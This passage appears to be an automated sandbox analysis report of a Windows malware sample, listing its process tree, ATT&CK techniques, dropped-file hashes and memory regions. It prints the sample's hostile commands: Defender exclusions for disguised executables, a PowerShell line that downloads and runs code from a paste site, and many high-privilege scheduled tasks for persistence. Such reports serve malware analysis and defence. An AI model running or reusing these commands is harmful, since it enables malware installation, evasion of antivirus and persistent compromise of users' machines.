  - Suspicious use of AdjustPrivilegeToken
  PID:4704
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\SendTo\SearchApp.exe'
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:3092
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files\WindowsPowerShell\Modules\PackageManagement\1.0.0.1\sysmon.exe'
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:1104
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Windows\TAPI\unsecapp.exe'
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:3784
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Windows\Provisioning\Packages\sppsvc.exe'
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:2392
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files (x86)\Reference Assemblies\Microsoft\csrss.exe'
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:3964
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files\Reference Assemblies\Microsoft\Framework\v3.5\RuntimeBroker.exe'
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:3848
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Windows\Performance\WinSAT\DataStore\Registry.exe'
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:740
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\tePxkUMuLk.bat"
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:2076
- - C:\Windows\system32\w32tm.exe
    w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
    3⤵
    PID:5668
- - C:\Windows\fr-FR\explorer.exe
    "C:\Windows\fr-FR\explorer.exe"
    3⤵
    - Checks computer location settings
    - Executes dropped EXE
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory
    PID:5708
  - - C:\Windows\System32\cmd.exe
      "C:\Windows\System32\cmd.exe" /C powershell "iwr https://pastejustit.com/raw/msdcgy3bxg | iex"
      4⤵
      Suspicious use of WriteProcessMemory
      PID:5272
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell "iwr https://pastejustit.com/raw/msdcgy3bxg | iex"
        5⤵
        Blocklisted process makes network request
        Suspicious use of AdjustPrivilegeToken
        Suspicious use of WriteProcessMemory
        
        PID:4676
      - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Roaming\runtime.bat" "
        6⤵
        Suspicious use of WriteProcessMemory
        
        PID:5676
        
        C:\Windows\system32\findstr.exe
        
        findstr /i "echo" "C:\Users\Admin\AppData\Roaming\runtime.bat"
        7⤵
        
        PID:644
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /S /D /c" echo \\DADDYSERVER "
        7⤵
        
        PID:5908
        
        C:\Windows\system32\findstr.exe
        
        findstr /i "DADDYSERVER"
        7⤵
        
        PID:6012

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "explorere" /sc MINUTE /mo 14 /tr "'C:\Windows\fr-FR\explorer.exe'" /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:1916

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "explorer" /sc ONLOGON /tr "'C:\Windows\fr-FR\explorer.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:2076

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "explorere" /sc MINUTE /mo 8 /tr "'C:\Windows\fr-FR\explorer.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:4472

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "OfficeClickToRunO" /sc MINUTE /mo 11 /tr "'C:\Windows\Prefetch\OfficeClickToRun.exe'" /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:4880

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "OfficeClickToRun" /sc ONLOGON /tr "'C:\Windows\Prefetch\OfficeClickToRun.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:2600

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "OfficeClickToRunO" /sc MINUTE /mo 5 /tr "'C:\Windows\Prefetch\OfficeClickToRun.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:3340

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "RuntimeBrokerR" /sc MINUTE /mo 10 /tr "'C:\Windows\PolicyDefinitions\de-DE\RuntimeBroker.exe'" /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:2368

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "RuntimeBroker" /sc ONLOGON /tr "'C:\Windows\PolicyDefinitions\de-DE\RuntimeBroker.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:5112

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "RuntimeBrokerR" /sc MINUTE /mo 6 /tr "'C:\Windows\PolicyDefinitions\de-DE\RuntimeBroker.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:624

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "dllhostd" /sc MINUTE /mo 9 /tr "'C:\Recovery\WindowsRE\dllhost.exe'" /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:1352

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "dllhost" /sc ONLOGON /tr "'C:\Recovery\WindowsRE\dllhost.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:2932

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "dllhostd" /sc MINUTE /mo 11 /tr "'C:\Recovery\WindowsRE\dllhost.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:4280

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "TextInputHostT" /sc MINUTE /mo 6 /tr "'C:\Recovery\WindowsRE\TextInputHost.exe'" /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:540

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "TextInputHost" /sc ONLOGON /tr "'C:\Recovery\WindowsRE\TextInputHost.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:1116

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "TextInputHostT" /sc MINUTE /mo 7 /tr "'C:\Recovery\WindowsRE\TextInputHost.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:4960

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "TextInputHostT" /sc MINUTE /mo 12 /tr "'C:\Program Files (x86)\Windows Photo Viewer\fr-FR\TextInputHost.exe'" /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:3464

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "TextInputHost" /sc ONLOGON /tr "'C:\Program Files (x86)\Windows Photo Viewer\fr-FR\TextInputHost.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:4332

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "TextInputHostT" /sc MINUTE /mo 13 /tr "'C:\Program Files (x86)\Windows Photo Viewer\fr-FR\TextInputHost.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:2608

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "wininitw" /sc MINUTE /mo 14 /tr "'C:\Program Files (x86)\Windows Photo Viewer\fr-FR\wininit.exe'" /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:3684

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "wininit" /sc ONLOGON /tr "'C:\Program Files (x86)\Windows Photo Viewer\fr-FR\wininit.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:1640

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "wininitw" /sc MINUTE /mo 12 /tr "'C:\Program Files (x86)\Windows Photo Viewer\fr-FR\wininit.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:3036

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "explorere" /sc MINUTE /mo 10 /tr "'C:\Program Files (x86)\MSBuild\explorer.exe'" /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:1956

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "explorer" /sc ONLOGON /tr "'C:\Program Files (x86)\MSBuild\explorer.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:464

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "explorere" /sc MINUTE /mo 10 /tr "'C:\Program Files (x86)\MSBuild\explorer.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:4956

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "SppExtComObjS" /sc MINUTE /mo 9 /tr "'C:\Program Files (x86)\Windows Multimedia Platform\SppExtComObj.exe'" /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:2144

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "SppExtComObj" /sc ONLOGON /tr "'C:\Program Files (x86)\Windows Multimedia Platform\SppExtComObj.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:3644

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "SppExtComObjS" /sc MINUTE /mo 7 /tr "'C:\Program Files (x86)\Windows Multimedia Platform\SppExtComObj.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:2940

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "dllhostd" /sc MINUTE /mo 11 /tr "'C:\Program Files\Windows Sidebar\Shared Gadgets\dllhost.exe'" /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:1412

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "dllhost" /sc ONLOGON /tr "'C:\Program Files\Windows Sidebar\Shared Gadgets\dllhost.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:1580

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "dllhostd" /sc MINUTE /mo 8 /tr "'C:\Program Files\Windows Sidebar\Shared Gadgets\dllhost.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:1700

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "SearchAppS" /sc MINUTE /mo 6 /tr "'C:\Users\Admin\SendTo\SearchApp.exe'" /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:2256

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "SearchApp" /sc ONLOGON /tr "'C:\Users\Admin\SendTo\SearchApp.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:1572

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "SearchAppS" /sc MINUTE /mo 12 /tr "'C:\Users\Admin\SendTo\SearchApp.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:3052

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "sysmons" /sc MINUTE /mo 8 /tr "'C:\Program Files\WindowsPowerShell\Modules\PackageManagement\1.0.0.1\sysmon.exe'" /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:1448

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "sysmon" /sc ONLOGON /tr "'C:\Program Files\WindowsPowerShell\Modules\PackageManagement\1.0.0.1\sysmon.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:5080

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "sysmons" /sc MINUTE /mo 6 /tr "'C:\Program Files\WindowsPowerShell\Modules\PackageManagement\1.0.0.1\sysmon.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:1860

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "unsecappu" /sc MINUTE /mo 14 /tr "'C:\Windows\TAPI\unsecapp.exe'" /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:1464

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "unsecapp" /sc ONLOGON /tr "'C:\Windows\TAPI\unsecapp.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:2696

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "unsecappu" /sc MINUTE /mo 5 /tr "'C:\Windows\TAPI\unsecapp.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:1108

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "sppsvcs" /sc MINUTE /mo 7 /tr "'C:\Windows\Provisioning\Packages\sppsvc.exe'" /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:1524

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "sppsvc" /sc ONLOGON /tr "'C:\Windows\Provisioning\Packages\sppsvc.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:4208

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "sppsvcs" /sc MINUTE /mo 5 /tr "'C:\Windows\Provisioning\Packages\sppsvc.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:700

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "csrssc" /sc MINUTE /mo 8 /tr "'C:\Program Files (x86)\Reference Assemblies\Microsoft\csrss.exe'" /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:4684

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "csrss" /sc ONLOGON /tr "'C:\Program Files (x86)\Reference Assemblies\Microsoft\csrss.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:4384

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "csrssc" /sc MINUTE /mo 10 /tr "'C:\Program Files (x86)\Reference Assemblies\Microsoft\csrss.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:4992

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "RuntimeBrokerR" /sc MINUTE /mo 6 /tr "'C:\Program Files\Reference Assemblies\Microsoft\Framework\v3.5\RuntimeBroker.exe'" /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:3320

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "RuntimeBroker" /sc ONLOGON /tr "'C:\Program Files\Reference Assemblies\Microsoft\Framework\v3.5\RuntimeBroker.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:1756

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "RuntimeBrokerR" /sc MINUTE /mo 10 /tr "'C:\Program Files\Reference Assemblies\Microsoft\Framework\v3.5\RuntimeBroker.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:5040

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "RegistryR" /sc MINUTE /mo 9 /tr "'C:\Windows\Performance\WinSAT\DataStore\Registry.exe'" /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:2568

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "Registry" /sc ONLOGON /tr "'C:\Windows\Performance\WinSAT\DataStore\Registry.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:3552

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "RegistryR" /sc MINUTE /mo 7 /tr "'C:\Windows\Performance\WinSAT\DataStore\Registry.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:2416

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Scheduled Task/Job

T1053

Scheduled Task

T1053.005

Persistence

Scheduled Task/Job

T1053

Scheduled Task

T1053.005

Privilege Escalation

Scheduled Task/Job

T1053

Scheduled Task

T1053.005

Defense Evasion

Credential Access

Discovery

Query Registry

T1012

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Recovery\WindowsRE\TextInputHost.exe

Filesize
61KB

MD5
3437a2105a9740ad94b06f04378bb5b9

SHA1
80ca4ebff21e3a4962ccdec2853308ba544cdeb9

SHA256
688fae8fd065227f1846cf2759f1946fc86a3d1fa2473c664595d6c32131b028

SHA512
5d30cc5fe4b59a99f8c188c9d9efeb22d4813bd1fed44b4cb6f4bc1d045d51a31591c40f41324fc0afd65e1b4630aa304f5e8d90009ec6f1c690c75313a74076

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

Filesize
2KB

MD5
f4038903775bd49192beef39594c3614

SHA1
db4d190d86ea4a231ce6b5408860220a1020077f

SHA256
97a71179aa74dbcd1c58694ee6d2fa7faa432312db4f803611ac478d9c0256ec

SHA512
059cf3c5afc9cc7eace9a6a9ae05db5ad1f7620e6def9885a317c377eb6cfe2056e4f3aa03c7a2035d21a332626d292116594303d97c5c82b8c5b0eedcbb9332

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
944B

MD5
62623d22bd9e037191765d5083ce16a3

SHA1
4a07da6872672f715a4780513d95ed8ddeefd259

SHA256
95d79fd575bbd21540e378fcbc1cd00d16f51af62ce15bae7080bb72c24e2010

SHA512
9a448b7a0d867466c2ea04ab84d2a9485d5fd20ab53b2b854f491831ee3f1d781b94d2635f7b0b35cb9f2d373cd52c67570879a56a42ed66bc9db06962ed4992

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
944B

MD5
cadef9abd087803c630df65264a6c81c

SHA1
babbf3636c347c8727c35f3eef2ee643dbcc4bd2

SHA256
cce65b73cdfe9304bcd5207913e8b60fb69faa20cd3b684f2b0343b755b99438

SHA512
7278aa87124abb382d9024a645e881e7b7cf1b84e8894943b36e018dbf0399e6858392f77980b599fa5488e2e21bf757a0702fe6419417edac93b68e0c2ec085

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
944B

MD5
6d3e9c29fe44e90aae6ed30ccf799ca8

SHA1
c7974ef72264bbdf13a2793ccf1aed11bc565dce

SHA256
2360634e63e8f0b5748e2c56ebb8f4aa78e71008ea7b5c9ca1c49be03b49557d

SHA512
60c38c4367352537545d859f64b9c5cbada94240478d1d039fd27b5ecba4dc1c90051557c16d802269703b873546ead416279c0a80c6fd5e49ad361cef22596a

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
944B

MD5
e8ce785f8ccc6d202d56fefc59764945

SHA1
ca032c62ddc5e0f26d84eff9895eb87f14e15960

SHA256
d85c19fc6b9d25e2168a2cc50ff38bd226fbf4f02aa7ac038a5f319522d2ffa4

SHA512
66460aec4afee582556270f8ee6048d130a090f1c12a2632ed71a99a4073e9931e9e1cc286e32debffb95a90bd955f0f0d6ec891b1c5cd2f0aae41eb6d25832f

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
944B

MD5
a8e8360d573a4ff072dcc6f09d992c88

SHA1
3446774433ceaf0b400073914facab11b98b6807

SHA256
bf5e284e8f95122bf75ead61c7e2b40f55c96742b05330b5b1cb7915991df13b

SHA512
4ee5167643d82082f57c42616007ef9be57f43f9731921bdf7bca611a914724ad94072d3c8f5b130fa54129e5328ccdebf37ba74339c37deb53e79df5cdf0dbe

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
944B

MD5
3a6bad9528f8e23fb5c77fbd81fa28e8

SHA1
f127317c3bc6407f536c0f0600dcbcf1aabfba36

SHA256
986366767de5873f1b170a63f2a33ce05132d1afd90c8f5017afbca8ef1beb05

SHA512
846002154a0ece6f3e9feda6f115d3161dc21b3789525dd62ae1d9188495171293efdbe7be4710666dd8a15e66b557315b5a02918a741ed1d5f3ff0c515b98e2

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
944B

MD5
5f0ddc7f3691c81ee14d17b419ba220d

SHA1
f0ef5fde8bab9d17c0b47137e014c91be888ee53

SHA256
a31805264b8b13ce4145f272cb2830728c186c46e314b48514d636866217add5

SHA512
2ce7c2a0833f581297c13dd88ccfcd36bf129d2b5d7718c52b1d67c97cbd8fc93abc085a040229a0fd712e880c690de7f6b996b0b47c46a091fabb7931be58d3

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
944B

MD5
bd5940f08d0be56e65e5f2aaf47c538e

SHA1
d7e31b87866e5e383ab5499da64aba50f03e8443

SHA256
2d2f364c75bd2897504249f42cdf1d19374f5230aad68fa9154ea3d03e3031a6

SHA512
c34d10c7e07da44a180fae9889b61f08903aa84e8ddfa80c31c272b1ef9d491b8cec6b8a4c836c3cb1583fe8f4955c6a8db872515de3a9e10eae09610c959406

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
39ac63b3ab11dd46cfd5730251d64d07

SHA1
a01250f0df365a965825e347184b905f3d11c366

SHA256
1a57ada7e84cafc64d8b96e486796464921f8455f59d6363c7d50f72570bb1ed

SHA512
9222d6925c6b0573e25783eafd041e9dbc8f5a092a51893d62561cf9c907a602795581ad70cad678c6301966001848d6cd270247033771398fec9e3af18b07c1

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_knhmalyz.ghe.ps1

Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
C:\Users\Admin\AppData\Local\Temp\kdotFyooc.bat

Filesize
171B

MD5
e733285e71b4a9f5b4d8621db7df6982

SHA1
a7a315bd04e7115a3e7a488c1faee47480281f47

SHA256
31aa232fe84f449546d9e24f048098a33e7319e361eb9e7d2fec542612a26c46

SHA512
d39d21d62ede4d13aa0544ecacdd48ecc94755ed713eca490b6bd6e3d6961c61cb7873ed382716bf5178eba7139366e8ea6deb84ad2fde0630b98f78578a46ba

Download Submit
C:\Users\Admin\AppData\Local\Temp\tePxkUMuLk.bat

Filesize
194B

MD5
3ab6a2ff846f1bb48c2ae6be66f58d78

SHA1
b5329fac519fbe7acb0a0ed0ddc2a175daf83960

SHA256
fd20b96eda2f3b54b477fcc07bcef58f1f2d25cc5fb7fb15d5add8d24455129d

SHA512
84766ec5234d206562fccc4d12597e50f09300a883ac27d60133ad182b89f343001d9ff0d8e3da7fa8b5e0aa00d2d969b0c9f5619e01d11cee2719bf0fbe494d

Download Submit
C:\Users\Admin\AppData\Roaming\runtime.bat

Filesize
104KB

MD5
8158350247e35657cbccf5054d8a6d33

SHA1
b2cbd3a164a21d168b281a43646a08f4717539af

SHA256
8d4934d75e3a578b2e836507ae1fd02fa67e33c79f5a784c2ead91fecc2fb8f0

SHA512
f772a497baaf2f73b4fa2565abc7e536ce1d505c51271646532662d89f1ee34ad593ffaebc99d67f343e4973268efea7b8bf6cd9f274c4266278fc0e71b04aff

Download Submit
memory/3380-59-0x00007FFE0B010000-0x00007FFE0BAD1000-memory.dmp

Filesize
10.8MB

Download
memory/3380-0-0x00007FFE0B013000-0x00007FFE0B015000-memory.dmp

Filesize
8KB

Download
memory/3380-6-0x000000001D050000-0x000000001D05C000-memory.dmp

Filesize
48KB

Download
memory/3380-5-0x000000001CFD0000-0x000000001CFDE000-memory.dmp

Filesize
56KB

Download
memory/3380-4-0x000000001CFC0000-0x000000001CFCC000-memory.dmp

Filesize
48KB

Download
memory/3380-3-0x000000001B520000-0x000000001B620000-memory.dmp

Filesize
1024KB

Download
memory/3380-2-0x00007FFE0B010000-0x00007FFE0BAD1000-memory.dmp

Filesize
10.8MB

Download
memory/3380-1-0x00000000000B0000-0x00000000000C8000-memory.dmp

Filesize
96KB

Download
memory/3772-9-0x00007FFE0B010000-0x00007FFE0BAD1000-memory.dmp

Filesize
10.8MB

Download
memory/3772-168-0x000001B6EBD40000-0x000001B6EC4E6000-memory.dmp

Filesize
7.6MB

Download
memory/3772-20-0x000001B6EAF80000-0x000001B6EAFA2000-memory.dmp

Filesize
136KB

Download
memory/3772-267-0x00007FFE0B010000-0x00007FFE0BAD1000-memory.dmp

Filesize
10.8MB

Download
memory/3772-21-0x00007FFE0B010000-0x00007FFE0BAD1000-memory.dmp

Filesize
10.8MB

Download
memory/3772-10-0x00007FFE0B010000-0x00007FFE0BAD1000-memory.dmp

Filesize
10.8MB

Download